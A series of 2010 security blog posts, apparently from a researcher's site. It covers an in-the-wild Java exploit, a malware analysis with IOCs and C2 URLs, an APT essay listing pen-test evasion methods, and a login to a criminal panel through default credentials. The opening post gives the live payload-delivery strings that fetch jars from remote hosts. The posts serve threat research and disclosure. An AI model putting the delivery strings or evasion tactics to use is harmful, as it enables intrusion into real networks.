We’re seeing the Java exploit used in the wild. It’s being hosted at: 92.52.88.240, 94.23.110.101, and 93.89.80.117 with the payload being delivered http: -J-jar -J\\\\85.9.22.19\\public\\0923.jar and http: -J-jar -J\\\\174.37.45.153\\public\\0923.jar

Sorry no time for a proper write up.

You Have to Model

April 18th, 2010

Richard Bejtlich posted an analysis of the current flight problems in Europe caused by the volcanic eruption. The article he cites is here. In the post, Richard rather broadly dismisses models in favor of “measurement”. I was a bit struck by this – especially given my focus as an undergrad on mathematical modeling.

You can’t understand the flight problem without a model. Yes you need data, but every mathematical model uses data. The purpose of this type of model is to estimate how an event affects the system – doing so in a mathematically valid manner that can be tested, with the model itself evaluated against existing data. Therefore, I’d argue there’s no innate conflict between a model and measurement/data. Models are heavy data consumers. They ingest the data, attempt to correlate it together, and then extrapolate future conditions. The easiest way in for someone unfamiliar with modeling is to think back to the hurricane season. Based on a tremendous amount of data, models are used to predict the likely path of hurricanes, their predicted winds, their speed, and amount of flooding. The models are far from perfect, but generally they’re pretty good – and the best we can do.

For the particular problem of the volcanic ash affecting flights, let’s consider our data:
  • Lufthansa flew 10 Boeing 737s between Munich and Frankfurt at particular points in time and experienced no perceivable problems.
  • Finnish Hornets flew through the cloud and had severe engine damage.
  • Historically planes have experienced numerous problems flying through ash clouds.
That’s all great, but it doesn’t answer the question people really want to know. Data is historical, but what we want is to predict what will happen in the future. The real question is what is the probability of an engine failure caused by the cloud while flying between points A and B at a particular time. You have to model the conditions to begin to answer that. Even if you’re flying from A to B+delta, the time and aircraft are likely different. Thus you have to model the slightly different location, the effect on the different craft, and any variations from the volcano in ash flow and particle properties. Data alone will only tell you if a particular flight flew safely, but that’s little good if you’re a regulator trying to determine if it’s safe to fly before the flight has occurred.

Also to note the London VAAC closed UK airspace. There are numerous VAACs which make recommendations to the respective leadership in their countries.

How does this relate to computer security? Only tangentially. I think the common thread is how decisions are made. It’s hard to find someone more data oriented than me, but once you have data it must be processed to tell you something about the future. That processing is a model. Whether it’s an analyst with a methodology or a math geek with a simulation, it’s some type of model. Therefore, it’s important to understand that you are modeling and how to do it well.

Wonderful Article – Crunching the Risk Analysis Numbers

April 15th, 2010

http://www.foreignaffairs.com/articles/66186/john-mueller-and-mark-g-stewart/hardly-existential?page=show

Malware-APR2010-01

April 14th, 2010

Sara Laughlin

Matthew Wollenweber

{belevume, mwollenw}@gwu.edu

Summary

On April 14, 2010 we detected an unknown executable being downloaded from a suspicious website. After investigating the matter we determined that 95.168.185.155 (also abantont.com) was hosting the malicious file summ.exe (MD5 = c42f4a697f096c99f8c9ece028083449). The page uses obfuscated javascript to load a java control which then downloads a java jar, which then downloads and executes summ.exe. The payload calls back to 76.76.103.219 (amostagorawe.com). The site buckomre.com (217.20.121.31) is also involved with the attack.

Analysis

We detected the malware via a standard IDS executable signature as follows:

The website in question hosted no real content, only highly obfuscated javascript as given below:

Attempting to study the malware in Malzilla was unfruitful given the high dependence on the DOM. Therefore we began manual deobfuscation:

The javascript decodes the initial blob of text into an unknown bit of code. It appears almost like raw binary javascript. However, we are not experts on Javascript. Our observation indicates that v1[v2](contentN) is this.neovarlag(payload). Examining contentN as a string we see:

There appear to be text fragments in there including what appears to say “application/java-”. Indeed if we let this execute we see a bit of Java load.

We next use Firebug to debug this further and discover the Java comes from \\abantont.com\50035\CO.php (though the connection is over HTTP). Visiting the page we get a Jar file which we decompress and then decompile the Class files with Jad. We see:

We’ve now found our mystery EXE downloaded from hxxp://abantont.com/50035/54098876 and then executed. The payload has an MD5 of c42f4a697f096c99f8c9ece028083449. Dynamic analysis was performed with Anubis and ThreatExpert. The payload changes various registry keys to ensure it remains persistent. It attempts to disable the Windows Firewall and AV. It appears to visit fake AV oriented sites. It then visits the command and control page: hxxp://amostagorawe.com/1025065312. Manual reversing was not performed on the executable.

Storm/Waledac Pcap

April 1st, 2010

Anyone have an old pcap for Storm (aka Waledac)? A friend wants/needs a pcap with the bot talking to the C&C.

Please leave a msg or email me mjw@cyberwart.com

APT Ramblings

March 14th, 2010

In a recent DailyDave post Dave Aitel writes:

<snip>

Anyways, if you’re sitting in a room with some hackers, you can always
do this: Ask them (as a group) if they could get kicked out of any
network they spent six months undetected in.

All hackers say “no” of course (what’s a hacker without an ego?) but
it’s interesting to see the facial expressions while they come to that
conclusion. With the right kind of eyes you can see the black wings
unfolding behind them as they think about it.
</snip>

I think the above is normal bait to dive into a hot topic – in this case Advanced Persistent Threat (APT). A lot of people have been writing about APT recently. Some posts are strictly marketing FUD. Others are thoughtful. The security community seems to have mixed feelings on the topic. I believe this stems from the fact that marketing FUD is mixed in with thoughtful analysis by some serious dudes. Then there’s also some crazy stammering about why cyber war FUD is scarier than APT analysis. It all makes a thoughtful discussion difficult.

Since everyone is writing on the topic and it’s a slow night, I’m up for a little rambling. First, as a penetration tester I’ve been on live networks, attacking remotely, been “caught”, and still maintained access to the network. Not too long ago I had a nice 9 month stretch where I got to do several “black” external pen tests with realistic rules of engagement. These engagements were executed with limited company knowledge – generally only known by CIO/CISO and up and allowed a lot of creativity. When we were detected (usually planned to measure the IR response) we’d see the incident response happen but it didn’t matter for several reasons including:

  1. We used multiple VPN and shell accounts to get random dynamic IP addresses. The IDS teams couldn’t block everything.
  2. We varied our attack payload and callbacks. I generally configure about 1/3 of my attacks to be different and slow. The machines callback between 24-48 hours later.
  3. Callbacks went to websites and traffic is generally valid HTML.
  4. The dropper callbacks are different than C&C.
  5. The payloads aren’t detected by any AV at the time of attack.
  6. If you utilize email to communicate defense against the attack – I’m probably reading.
  7. Domain Admins love to remote into compromised Windows machines to figure out what’s going on.
  8. After I crack a few passwords using your VPN is lovely.

I’m not sure of a technical description of APT, but I think maintaining covert access to critical systems and accounts through an active incident response qualifies.

Does all this mean defense is useless? No, definitely not. All the above is fairly labor intensive and not profitable in most criminal activities. The criminals, for the most part, are running SPAM-like schemes. They push fake antivirus, fake traffic for pay-per-click/sales-referrals, or send SPAM. I can’t provide solid metrics on the previous assertion, but in my experience it appears to be true. Further, criminal attacks need to achieve criminal profit, so they have to monetize their activities, and the above seem to be the easiest and most common methods. To achieve these objectives, they want to own a lot of different boxes, drive a few clicks, try to make a fake AV or porn purchase, and send email until it’s fixed. In that business model it simply doesn’t make sense to work hard to maintain access. Additionally, if you’re dropping your toolkit on thousands of hosts, it’s going to get expensive and complicated to avoid getting your builds purged by AV updates. Therefore, I think that for most organizations worrying about APT as the expected threat model doesn’t make sense in a risk management analysis.

The cynics out there, myself included, will mention that protecting your particular organization against generalized attack trends hardly ensures security. I can’t argue at all with that sentiment. However, most organizations have tremendous difficulty defending their networks from phishing attacks to download AV, porn, porn players, and porn codecs. Throw in the monthly Adobe Reader exploit being spammed out to 10,000 employees and many organizations struggle. Zeus is another great counter example. As a huge botnet targeting financial information it’s proof that not all crimeware is as described above. But for every info stealing bot I see, I discover 10+ as described above.

What about everyone else, those past the easiest low-hanging fruit? I still argue not to worry. All the reasons are implied in Dave’s post. First, he assumes the hacker is going to get into the network. Second, the hackers aren’t going to get booted out. I think these are sound assumptions and follow from how I read “hacker”. In this context I think it means “a professional paid to compromise and maintain access to corporate networks”. From there I think the true nature of the problem is apparent, i.e. you’re worrying that if you’re attacked by a “hacker” you’re going to get owned and APT is going to be a nightmare. You will. These types of people do what they do because they can defeat most security teams. It’s what they do. Still, don’t worry. This further boils down to this (silly) analogy:

If you’re a corporate executive walking down the street – not in a bad neighborhood and not causing problems, with a couple bodyguards (your security team), and a team of ninja (hackers) try to rob and kill you they probably will. But how many dudes are attacked by a team of ninjas?

Speaking of ninjas, did you guys hear about the Hamas official assassinated in Dubai? It was like a team of ninjas…

Hello Koko

March 9th, 2010

Today an in-house tool I’ve been developing (Dragonslayer) triggered on events matching both a PDF signature and traffic to hosts on the MalwareDomainList. In particular it was hitting on IP 79.171.22.190, which is hosted as kokojamba.com.
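The Dragonslayer alert above is a correlation: a PDF fetch on its own is noise, a hit on a blocklisted host on its own is a weak signal, but the same workstation doing both is worth a look. As an added example (not the post’s own tool), this Python sketch applies that logic to constructed proxy log lines against a small blocklist in the style of MalwareDomainList; the IP and host name are the ones from the post, while the log format, the internal addresses, the URLs and the blocklist format are assumptions.

```python
# Constructed blocklist in the style of MalwareDomainList: "host-or-ip,description".
# The IP and host name come from the post; the format and descriptions are constructed.
MALWARE_DOMAIN_LIST = """\
# host or IP, description
79.171.22.190,kokojamba.com exploit kit
kokojamba.com,exploit kit landing page
"""

# Constructed proxy log lines: time, client, method, URL, status, content type, bytes.
WEB_LOG = """\
2010-03-09T10:02:11 10.1.4.22 GET http://kokojamba.com/load.php?spl=pdf 200 application/pdf 41207
2010-03-09T10:02:13 10.1.4.22 GET http://79.171.22.190/files/win.exe 200 application/octet-stream 118272
2010-03-09T10:05:40 10.1.4.57 GET http://docs.intranet.test/policy.pdf 200 application/pdf 90112
2010-03-09T10:06:02 10.1.4.22 GET http://www.intranet.test/ 200 text/html 3020
"""


def load_blocklist(text):
    """Return the set of blocklisted hosts/IPs, ignoring comments and blank lines."""
    entries = set()
    for line in text.splitlines():
        if line and not line.startswith("#"):
            entries.add(line.split(",")[0].strip().lower())
    return entries


def host_of(url):
    return url.split("://", 1)[1].split("/", 1)[0].lower()


def is_pdf(ctype, url):
    """The 'PDF signature' for this sketch: a PDF content type or a .pdf path."""
    path = url.split("://", 1)[1].partition("/")[2].partition("?")[0]
    return ctype == "application/pdf" or path.lower().endswith(".pdf")


def correlate(log, blocklist):
    """Map each client that both fetched a PDF and contacted a blocklisted host
    to the blocklisted URLs it requested. Either signal alone is not reported."""
    pdf_fetchers, blocked = set(), {}
    for line in log.splitlines():
        _ts, src, _method, url, _status, ctype, _size = line.split()
        if is_pdf(ctype, url):
            pdf_fetchers.add(src)
        if host_of(url) in blocklist:
            blocked.setdefault(src, []).append(url)
    return {src: urls for src, urls in blocked.items() if src in pdf_fetchers}


if __name__ == "__main__":
    for src, urls in correlate(WEB_LOG, load_blocklist(MALWARE_DOMAIN_LIST)).items():
        print(src, "->", urls)
```

On the constructed log, 10.1.4.57 fetched a PDF from an internal server and is left alone, while 10.1.4.22 is reported with both the kokojamba.com landing page and the follow-on download from 79.171.22.190.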

The host is registered as follows:

Domain Whois record
Queried whois.internic.net with “dom kokojamba.com”…

Domain name: kokojamba.com
Status: Active

Registrant:
  Name: Andrzej Ignashevitch
  Address: Pulawska, 15
  City: Warszawa
  Province/state: poland
  Country: PL
  Postal Code: PL-02515

Administrative Contact:
  Name: Andrzej Ignashevitch
  Organization: Andrzej Ignashevitch
  Address: Pulawska, 15
  City: Warszawa
  Province/state: poland
  Country: PL
  Postal Code: PL-02515
  Phone: +48.713965232
  Fax: +48.713965232
  Email: magikmind13@gmail.com

Technical Contact:
  Name: Andrzej Ignashevitch
  Organization: Andrzej Ignashevitch
  Address: Pulawska, 15
  City: Warszawa
  Province/state: poland
  Country: PL
  Postal Code: PL-02515

Nameserver Information:
  ns1.kokojamba.com
  ns2.kokojamba.com

Create: 2010-03-04 20:05:36
Update: 2010-03-04

The admin panel had the default user/password of “admin”:”admin”.

Here’s what’s on the inside:

I wrote a quick Python script to download all the compromised host data. It’s available here: http://www.cyberwart.com/files/koko.txt.gz. I’m not sure if each IP is actually compromised or only downloaded one or more payloads. It doesn’t appear that simply visiting the site gets you on the list. Also, the files-downloaded feature seems broken, as I’ve seen payloads delivered that don’t show up on the list.

Can you believe that hot blond on Facebook wasn’t just desperate to meet me?!

February 14th, 2010

So a hot blond decided to randomly add me on Facebook. I know what you’re thinking: “Matt with your dashing good looks, charm, and terrific fashion sense, I’m sure you have models contacting you all the time”. I won’t argue with your logic, but in my boredom I decided to investigate a little. Here’s what I found:


If you think this isn’t normal there’s a job req up on fling: